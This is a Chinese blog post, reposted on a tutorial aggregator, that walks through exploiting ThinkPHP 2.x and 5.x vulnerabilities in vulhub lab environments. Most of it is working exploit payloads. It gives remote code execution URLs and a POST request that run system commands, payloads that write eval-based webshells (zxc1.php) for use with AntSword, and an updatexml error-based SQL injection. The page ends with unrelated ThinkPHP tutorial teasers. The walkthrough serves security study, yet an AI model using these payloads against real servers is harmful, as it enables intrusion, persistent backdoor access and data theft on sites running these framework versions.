Thinkphp5漏洞复现

内容导读

互联网集市收集整理的这篇技术教程文章主要介绍了Thinkphp5漏洞复现，小编现在分享给大家，供广大互联网技能从业者学习和参考。文章包含2444字，纯文字阅读大概需要4分钟。

内容图文

简介

漏洞环境：均为vulhub

2-rce（thinkphp 2.x任意代码执行漏洞）

参考链接：

https://www.cnblogs.com/g0udan/p/12252383.html

漏洞复现

漏洞验证payload：

http://目标IP/index.php?s=/index/index/name/$%7B@phpinfo()%7D

Thinkphp5漏洞复现 - 文章图片

蚁剑连接payload，密码1：

http://目标IP/index.php?s=/index/index/name/${@print%28eval%28$_POST[1]%29%29}

将上面整条语句放入到蚁剑的连接地址中

Thinkphp5漏洞复现 - 文章图片

连接成功！

5.0.23-rce

参考链接：

https://blog.csdn.net/satasun/article/details/110818672

影响范围：ThinkPHP 5.0.x：5.0.x ~ 5.0.23

漏洞复现

真实吐了啊，复现一直不成功，后来把请求头中的内容都换了（除了host），然后成功了。如果你跟我一样，payload都没有什么问题，可以尝试下这个方法。POST请求报文如下：

POST /index.php?s=captcha HTTP/1.1
Host: 服务端IP
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

_method=__construct&filter[]=system&method=get&get[]=id

Thinkphp5漏洞复现 - 文章图片

写入webshell，可以用echo命令写入，但是写入后没有回显。

Thinkphp5漏洞复现 - 文章图片

5-rce

参考链接：

https://blog.cocofan.cn/tp5漏洞/

https://blog.csdn.net/weixin_40709439/article/details/86564457

https://www.ddosi.com/b218/

这个漏洞的标题是5-rce，但是这个漏洞因为版本和是否开启debug模式的问题，导致poc数量较多，这里只以vulhub的漏洞进行复现，感兴趣的可以看参考的第二个链接。

漏洞复现

使用下面payload执行phpinfo代码，判断有误漏洞。

http://目标IP/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

Thinkphp5漏洞复现 - 文章图片

执行系统命令：

http://服务端IP/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

Thinkphp5漏洞复现 - 文章图片

http://服务端IP/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=zxc1.php&vars[1][]=%3C?php%20@eval($_POST[cmd]);?%3E

写入shell，上面的poc成功后页面回显27，回显的写入的payload的长度。生成的webshell名为zxc1.php，使用蚁剑访问连接。

Thinkphp5漏洞复现 - 文章图片

提示

复制到博客里，发现居然还有这种问题，无语。

Thinkphp5漏洞复现 - 文章图片

in-sqlinjection_web_1

参考链接：

https://blog.csdn.net/weixin_41598660/article/details/104063002

https://blog.csdn.net/weixin_44940180/article/details/107859666

漏洞复现

使用下面poc进行漏洞验证，如果显示了用户名，说明存在漏洞。

http://目标IP/index.php?ids[]=1&ids[]=2，

Thinkphp5漏洞复现 - 文章图片

使用下面payload，可以进行报错注入，显示出用户名。

http://目标IP/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1

Thinkphp5漏洞复现 - 文章图片

总结

tp5的漏洞还是挺多的，我写的时候才发现tp6出了。

emm，并没有认真把这篇文章写完，留坑了。

内容总结

以上是互联网集市为您收集整理的Thinkphp5漏洞复现全部内容，希望文章能够帮你解决Thinkphp5漏洞复现所遇到的程序开发问题。如果觉得互联网集市技术教程内容还不错，欢迎将互联网集市网站推荐给程序员好友。

内容备注

版权声明：本文内容由互联网用户自发贡献，该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容，请发送邮件至 gblab@vip.qq.com 举报，一经查实，本站将立刻删除。

内容手机端

扫描二维码推送至手机访问。

本文链接：https://qyyshop.com/info/591381.html

来源：【匿名】

【上一篇】PHP正在获取网站ICO站标源码【下一篇】PHP 5 数据对象 (PDO) 抽象层与 Oracle

更多 ►

【Thinkphp5漏洞复现】教程文章相关的互联网学习教程文章

在thinkphp的框架下实现分页。公司的网站基于Thinkphp框架，一直久闻thinkphp的大名，终于有机会实战了。thinkphp是MVC架构的，MVC对于任何ITers来说都不陌生，模型(model)－视图(view)－控制器(controller)。他将逻辑和数据分开处理，少了很多繁琐的过程。其实在官方的资料中已经详细的介绍了怎么分页，传送门：http://document.thinkphp.cn/manual_3_2.html#data_page可是并不适用于数据已经从DB中取出，并且转换为数组的情况，我...

ThinkPHP3快速入门教程三：查询语言

一、查询语言简介： ThinkPHP内置了非常灵活的查询方法，可以快速的进行数据查询操作，查询条件可以用于读取、更新和删除等操作，主要涉及到where方法等连贯相关方法操作即可，此框架查询系统可以解决不同数据库的差异性，因些我们把框架的这一查询方式称之为查询语言。使其查询操作更加简单易懂。二、查询方式：ThinkPHP可以支持直接使用字符串作为查询条件，但是大多数情况推荐使用索引数组或者对象来作为查询条件，因为会更加安...

项目中引用ThinkPHP框架【图】

ThinkPHP是一个宽度、兼容且简单的国产的轻量级框架，具有优良的性能，并且非常注重易用性。　　那么，我们该如何将ThinkPHP引入自己的项目中，使得自己的项目可以使用这款优良的框架呢？　　首先介绍下ThinkPHP框架的目录结构：　　Common：框架的核心函数库　　Conf：框架的核心配置文件目录　　Lang：语言包　　Library：框架的核心资源库目录　　ThinkPHP.php：核心入口文件所以，如果我们想要引用ThinkPHP的框架，非常简单，首...

ThinkPHP无限级分类原理实现留言与回复功能实例

本文所述留言板程序使用了无限级分类的原理，可以实现无限级留言与回复。留言列表gclist保留了留言层次空格，使留言--回复层次分明。分享给大家供大家参考。具体分析如下：功能上，本程序可以实现无限级留言与回复，即对留言回复，对回复的留言回复。当然你也可以作有限制的控制，使其只对留言回复，关键是在模板代码中去掉回复的留言中的“回复该留言”即可。欢迎去拍砖！程序效果如下图所示：完整源码点击此处本站下载。数据表：...

ThinkPhp02【代码】【图】

一、什么是MVC M -Model 编写model类对数据进行操作 V -View 编写html文件，页面呈现 C -Controller 编写类文件（UserAction.class.php）二、ThinkPHP的MVC特点三、ThinkPHP的MVC对应的目录 M 项目目录/应用目录/Lib/Model V 项目目录/应用目录/Tpl C 项目目录/应用目录/Lib/Action四、url访问C 五、url的4种访问方式 1.PATHINFO 模式 -- 重点！！！！！！ http://域名/...

ThinkPHP学习（三）配置PHP5支持MySQL，连接MySQL数据库【图】

配置PHP5支持MySQL打开PHP配置文件“F:\PHP\php5328Win32\php.ini”，查找“extension=php_mysql.dll”，把前面的分号去掉，保存文件，启动服务；却提示“PHP startup: Unable to load dynamic library :F:\PHP\php_mysql.dll”错误，解决办法，打开PHP配置文件“F:\PHP\php5328Win32\php.ini”，查找“extension_dir = "ext"”，把前面的分号去掉，保存文件，启动服务，问题解决；准备测试数据如果你还没有安装MySQL，请先安装MyS...

使用xdebug分析thinkphp框架函数调用图【图】

开发中需要性能调优，使用xdebug分析thinkphp框架函数调用图。关于xdebug的安装参考这2篇NetBeans配置Xdebug 远程调试PHPphp扩展xdebug安装以及用kcachegrind系统分析 1.安装xdebug需要先去http://www.xdebug.org看看一些文档，xdebug作为php扩展安装# http://www.xdebug.org/files/xdebug-2.3.3.tgz# tar -xzf xdebug-2.3.3.tgz# cd xdebug-2.3.3# /usr/local/php/bin/phpize# ./configure --enable-xdebug --with-php-config=/u...

thinkphp自动创建数据对象解析【代码】

thinkphp有一个自动创建数据对象的create方法，核心代码如下 public function create($data=‘‘,$type=‘‘) {// 如果没有传值默认取POST数据if(empty($data)) {$data = I(‘post.‘);}elseif(is_object($data)){$data = get_object_vars($data);}// 判断是否有主键，有代表修改，没有代表插入$type = $type?:(!empty($data[$this->getPk()])?self::MODEL_UPDATE:self::MODEL_INSERT);// 生成数据对象，先获取该模型所有...

thinkphp中在编辑一条数据时不用JS实现自动选中下拉框

<select name="auth_pid" id="auth_pid"> <option value="0" >--请选择--</option> <volist name="auth_list" id="item"> <eq name="item.auth_id" value="$auth_info.auth_pid"> <option value="<{$item.auth_id}>" selected ><{$item.auth_name}></option> <else /> <option value="<{$item.auth_id}>" ><{$item.auth_name}></option> </eq> </volist><...

基于 ThinkPHP 3.2.3 的页面静态化功能的实现【代码】

PHP 的页面静态化有多种实现方式，比如使用输出缓冲（output buffering），该种方式是把数据缓存在 PHP 的缓冲区（内存）中，下一次取数据时直接从缓冲区中读取数据，从而避免了脚本的编译和访问数据库等过程；另一种方式是直接生成静态的 HTML 文件，使用文件读写函数来实现，一些内容不经常改动的页面可以使用静态页面，访客访问到的页面就是真实的 HTML 页面，一些常见的 CMS 会使用该种方法。以第二种方法为例，参考 DedeCMS ...

ThinkPhp 生成静态页面【代码】

//开启静态缓存‘HTML_CACHE_ON‘ => true, //开启缓存‘HTML_CACHE_TIME‘ =>60, //开启缓存时间‘HTML_FILE_SUFFIX‘ => ‘.shtml‘, //生成缓存文件的后缀名‘HTML_PATH‘ => ‘Html‘, //生成缓存文件保存目录‘HTML_CACHE_RULES‘=>array( ‘Index:index‘ => ‘{:controller}/{:action}‘, ‘Seller:index‘ => ‘{:controller}/{:action}‘, ‘Course:index‘ => ‘{:controller}/{:actio...

thinkphp的select和find的区别(转)

做普通PHP项目转thinkphp时，字段自动完整匹配，ajax时前台数据一直取不到，后发现是select和find返回数据集有差异，参考下面方法修改。$this->ajaxReturn($msg[0]); select返回的是二维数组，find返回一维数组。 thinkphp是比较好的php开发框架，能比较快速的开发MVC架构的管理系统，我们需要用到 select()和find()方法，两个方法都能返回数据集数组，但有什么不同呢？先看一下我的代码对比：[php] view plaincopyprint?$tech=M(‘...

thinkphp 支付宝错误 Class 'Think' not found

Class ‘Think‘ not found D:\www\DonatePlatform\ThinkPHP\Extend\Vendor\alipay\lib\alipay_submit.class.php 第 29 行.经过仔细排查发现alipay_submit.class.php中这个方法 function AlipaySubmit($alipay_config) { $this->__construct($alipay_config); }方法名称与类名称相同，其实下面的办法是为了兼容php版本，我的是php5.2.6所以我把AlipaySubmit方法注释掉了，结果没有错误了，可以正常使用，或者你可以改这个方法名...

【ThinkPHP框架学习】(2) --- 后台管理系统如何用iframe点击左边右边局部刷新【图】

如题：在写后台管理系统时，需要实现后台界面的局部动态刷新。左边的导航栏使用a标签进行设置，通过href和target属性的配合，就可以将iframe中的子页实现动态刷新。原理：设这你的 iframe 的名字比如iframe name="main"你左边的页面中 <a href="Article_Manage.asp" target="main">文章管理</a>解读源码：1.在右边嵌套框中写入嵌套代码 iframe 设置为name = iframe 2.然后在左边导航链接中加入...

ThinkPHP分类查询(获取当前分类的子分类，获取父分类，下一级分类)【代码】

获取指定分类的所有子分类ID号//获取指定分类的所有子分类ID号function getAllChildcateIds($categoryID){//初始化ID数组$array[] = $categoryID;do {$ids = ‘‘;$where[‘pid‘] = array(‘in‘,$categoryID);$cate = M(‘cate‘)->where($where)->select();foreach ($cateas$k=>$v){$array[] = $v[‘id‘];$ids .= ‘,‘ . $v[‘id‘];}$ids = substr($ids, 1, strlen($ids));$categoryID = $ids;}while (!empty($cate));$ids =...

首页 / PHP / Thinkphp5漏洞复现

Thinkphp5漏洞复现

内容导读

内容图文

简介

2-rce（thinkphp 2.x任意代码执行漏洞）

漏洞复现

5.0.23-rce

漏洞复现

5-rce

漏洞复现

提示

in-sqlinjection_web_1

漏洞复现

总结

内容总结

内容备注

内容手机端

【Thinkphp5漏洞复现】教程文章相关的互联网学习教程文章

thinkphp实现数组分页示例

ThinkPHP3快速入门教程三：查询语言

项目中引用ThinkPHP框架【图】

ThinkPHP无限级分类原理实现留言与回复功能实例

ThinkPhp02【代码】【图】

ThinkPHP学习（三）配置PHP5支持MySQL，连接MySQL数据库【图】

使用xdebug分析thinkphp框架函数调用图【图】

thinkphp自动创建数据对象解析【代码】

thinkphp中在编辑一条数据时不用JS实现自动选中下拉框

基于 ThinkPHP 3.2.3 的页面静态化功能的实现【代码】

ThinkPhp 生成静态页面【代码】

thinkphp的select和find的区别(转)

thinkphp 支付宝错误 Class 'Think' not found

【ThinkPHP框架学习】(2) --- 后台管理系统如何用iframe点击左边右边局部刷新【图】

ThinkPHP分类查询(获取当前分类的子分类，获取父分类，下一级分类)【代码】

THINKPHP5 - 相关标签

漏洞 - 相关标签

PHP - 技术教程分类

PHP - 最新教程

PHP - 最热教程